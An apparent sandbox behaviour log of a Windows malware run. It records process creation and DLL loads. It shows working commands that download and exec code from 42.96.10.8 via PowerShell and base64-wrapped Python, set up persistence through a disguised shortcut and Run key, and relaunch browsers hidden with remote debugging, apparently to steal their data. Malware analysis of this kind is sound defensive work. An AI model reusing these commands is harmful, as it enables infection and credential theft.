                Source: C:\Windows\System32\chcp.comKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: synaptics.exeBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                Source: synaptics.exeBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                Source: synaptics.exeBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                Source: synaptics.exeBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                Source: synaptics.exeBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                Source: synaptics.exeBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                Source: synaptics.exeString found in binary or memory: can't send non-None value to a just-started coroutine
                Source: synaptics.exeString found in binary or memory: can't send non-None value to a just-started async generator
                Source: synaptics.exeString found in binary or memory: can't send non-None value to a just-started generator
                Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\x.bat" "
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta vbscript:createobject("wscript.shell").run("""C:\Users\user\Desktop\x.bat"" ::",0)(window.close)
                Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\x.bat" ::"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('http://42.96.10.8/envxfix.zip', [System.IO.Path]::GetTempPath() + 'xFSOj9El1Q.zip') "
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $dst = [System.IO.Path]::Combine([System.Environment]::GetFolderPath('LocalApplicationData'), 'xFSOj9El1Q'); Add-Type -AssemblyName System.IO.Compression.FileSystem; if (Test-Path $dst) { Remove-Item -Recurse -Force "$dst\*" } else { New-Item -ItemType Directory -Force $dst } ; [System.IO.Compression.ZipFile]::ExtractToDirectory([System.IO.Path]::Combine([System.IO.Path]::GetTempPath(), 'xFSOj9El1Q.zip'), $dst) "
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $s = $payload = "import base64;exec(base64.b64decode('aW1wb3J0IHVybGxpYi5yZXF1ZXN0O2ltcG9ydCBiYXNlNjQ7ZXhlYyhiYXNlNjQuYjY0ZGVjb2RlKHVybGxpYi5yZXF1ZXN0LnVybG9wZW4oJ2h0dHA6Ly80Mi45Ni4xMC44L1ZPSU5FX0JVJykucmVhZCgpLmRlY29kZSgndXRmLTgnKSkp'))";$obj = New-Object -ComObject WScript.Shell;$link = $obj.CreateShortcut("$env:LOCALAPPDATA\WindowsSecurity.lnk");$link.WindowStyle = 7;$link.TargetPath = "$env:LOCALAPPDATA\xFSOj9El1Q\synaptics.exe";$link.IconLocation = "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,13";$link.Arguments = "-c `"$payload`"";$link.Save() "
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Windows Security' -PropertyType String -Value 'C:\Windows\Explorer.EXE C:\Users\user\AppData\Local\WindowsSecurity.lnk' -Force "
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe" -c "import base64;exec(base64.b64decode('aW1wb3J0IHVybGxpYi5yZXF1ZXN0O2ltcG9ydCBiYXNlNjQ7ZXhlYyhiYXNlNjQuYjY0ZGVjb2RlKHVybGxpYi5yZXF1ZXN0LnVybG9wZW4oJ2h0dHA6Ly80Mi45Ni4xMC44L1ZPSU5FX0JVJykucmVhZCgpLmRlY29kZSgndXRmLTgnKSkp'))"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe "C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe" -c "import base64;exec(base64.b64decode('aW1wb3J0IHVybGxpYi5yZXF1ZXN0O2ltcG9ydCBiYXNlNjQ7ZXhlYyhiYXNlNjQuYjY0ZGVjb2RlKHVybGxpYi5yZXF1ZXN0LnVybG9wZW4oJ2h0dHA6Ly80Mi45Ni4xMC44L1ZPSU5FX0JVJykucmVhZCgpLmRlY29kZSgndXRmLTgnKSkp'))"
                Source: unknownProcess created: C:\Windows\explorer.exe "C:\Windows\Explorer.EXE" C:\Users\user\AppData\Local\WindowsSecurity.lnk
                Source: unknownProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe "C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe" -c "import base64;exec(base64.b64decode('aW1wb3J0IHVybGxpYi5yZXF1ZXN0O2ltcG9ydCBiYXNlNjQ7ZXhlYyhiYXNlNjQuYjY0ZGVjb2RlKHVybGxpYi5yZXF1ZXN0LnVybG9wZW4oJ2h0dHA6Ly80Mi45Ni4xMC44L1ZPSU5FX0JVJykucmVhZCgpLmRlY29kZSgndXRmLTgnKSkp'))"
                Source: unknownProcess created: C:\Windows\explorer.exe "C:\Windows\Explorer.EXE" C:\Users\user\AppData\Local\WindowsSecurity.lnk
                Source: unknownProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe "C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe" -c "import base64;exec(base64.b64decode('aW1wb3J0IHVybGxpYi5yZXF1ZXN0O2ltcG9ydCBiYXNlNjQ7ZXhlYyhiYXNlNjQuYjY0ZGVjb2RlKHVybGxpYi5yZXF1ZXN0LnVybG9wZW4oJ2h0dHA6Ly80Mi45Ni4xMC44L1ZPSU5FX0JVJykucmVhZCgpLmRlY29kZSgndXRmLTgnKSkp'))"
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe
                Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe
                Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe
                Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=1980 --field-trial-handle=1952,i,12130508596491223167,1187970668335390785,262144 /prefetch:8
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2016 --field-trial-handle=1156,i,13827792788180171334,7255104134237789942,262144 /prefetch:8
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe
                Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:/Program Files (x86)/Microsoft/Edge/Application/msedge.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2572 --field-trial-handle=2448,i,15289098796550783955,16860821429903123602,262144 /prefetch:3
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta vbscript:createobject("wscript.shell").run("""C:\Users\user\Desktop\x.bat"" ::",0)(window.close)Jump to behavior
                Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\x.bat" ::"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('http://42.96.10.8/envxfix.zip', [System.IO.Path]::GetTempPath() + 'xFSOj9El1Q.zip') "Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $dst = [System.IO.Path]::Combine([System.Environment]::GetFolderPath('LocalApplicationData'), 'xFSOj9El1Q'); Add-Type -AssemblyName System.IO.Compression.FileSystem; if (Test-Path $dst) { Remove-Item -Recurse -Force "$dst\*" } else { New-Item -ItemType Directory -Force $dst } ; [System.IO.Compression.ZipFile]::ExtractToDirectory([System.IO.Path]::Combine([System.IO.Path]::GetTempPath(), 'xFSOj9El1Q.zip'), $dst) "Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $s = $payload = "import base64;exec(base64.b64decode('aW1wb3J0IHVybGxpYi5yZXF1ZXN0O2ltcG9ydCBiYXNlNjQ7ZXhlYyhiYXNlNjQuYjY0ZGVjb2RlKHVybGxpYi5yZXF1ZXN0LnVybG9wZW4oJ2h0dHA6Ly80Mi45Ni4xMC44L1ZPSU5FX0JVJykucmVhZCgpLmRlY29kZSgndXRmLTgnKSkp'))";$obj = New-Object -ComObject WScript.Shell;$link = $obj.CreateShortcut("$env:LOCALAPPDATA\WindowsSecurity.lnk");$link.WindowStyle = 7;$link.TargetPath = "$env:LOCALAPPDATA\xFSOj9El1Q\synaptics.exe";$link.IconLocation = "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,13";$link.Arguments = "-c `"$payload`"";$link.Save() "Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Windows Security' -PropertyType String -Value 'C:\Windows\Explorer.EXE C:\Users\user\AppData\Local\WindowsSecurity.lnk' -Force "Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe" -c "import base64;exec(base64.b64decode('aW1wb3J0IHVybGxpYi5yZXF1ZXN0O2ltcG9ydCBiYXNlNjQ7ZXhlYyhiYXNlNjQuYjY0ZGVjb2RlKHVybGxpYi5yZXF1ZXN0LnVybG9wZW4oJ2h0dHA6Ly80Mi45Ni4xMC44L1ZPSU5FX0JVJykucmVhZCgpLmRlY29kZSgndXRmLTgnKSkp'))" Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe "C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe" -c "import base64;exec(base64.b64decode('aW1wb3J0IHVybGxpYi5yZXF1ZXN0O2ltcG9ydCBiYXNlNjQ7ZXhlYyhiYXNlNjQuYjY0ZGVjb2RlKHVybGxpYi5yZXF1ZXN0LnVybG9wZW4oJ2h0dHA6Ly80Mi45Ni4xMC44L1ZPSU5FX0JVJykucmVhZCgpLmRlY29kZSgndXRmLTgnKSkp'))" Jump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exeJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandboxJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe "C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe" -c "import base64;exec(base64.b64decode('aW1wb3J0IHVybGxpYi5yZXF1ZXN0O2ltcG9ydCBiYXNlNjQ7ZXhlYyhiYXNlNjQuYjY0ZGVjb2RlKHVybGxpYi5yZXF1ZXN0LnVybG9wZW4oJ2h0dHA6Ly80Mi45Ni4xMC44L1ZPSU5FX0JVJykucmVhZCgpLmRlY29kZSgndXRmLTgnKSkp'))"Jump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe "C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe" -c "import base64;exec(base64.b64decode('aW1wb3J0IHVybGxpYi5yZXF1ZXN0O2ltcG9ydCBiYXNlNjQ7ZXhlYyhiYXNlNjQuYjY0ZGVjb2RlKHVybGxpYi5yZXF1ZXN0LnVybG9wZW4oJ2h0dHA6Ly80Mi45Ni4xMC44L1ZPSU5FX0JVJykucmVhZCgpLmRlY29kZSgndXRmLTgnKSkp'))"
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:/Program Files (x86)/Microsoft/Edge/Application/msedge.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=1980 --field-trial-handle=1952,i,12130508596491223167,1187970668335390785,262144 /prefetch:8
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2016 --field-trial-handle=1156,i,13827792788180171334,7255104134237789942,262144 /prefetch:8
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2572 --field-trial-handle=2448,i,15289098796550783955,16860821429903123602,262144 /prefetch:3
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
                Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: vbscript.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dllJump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
                Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
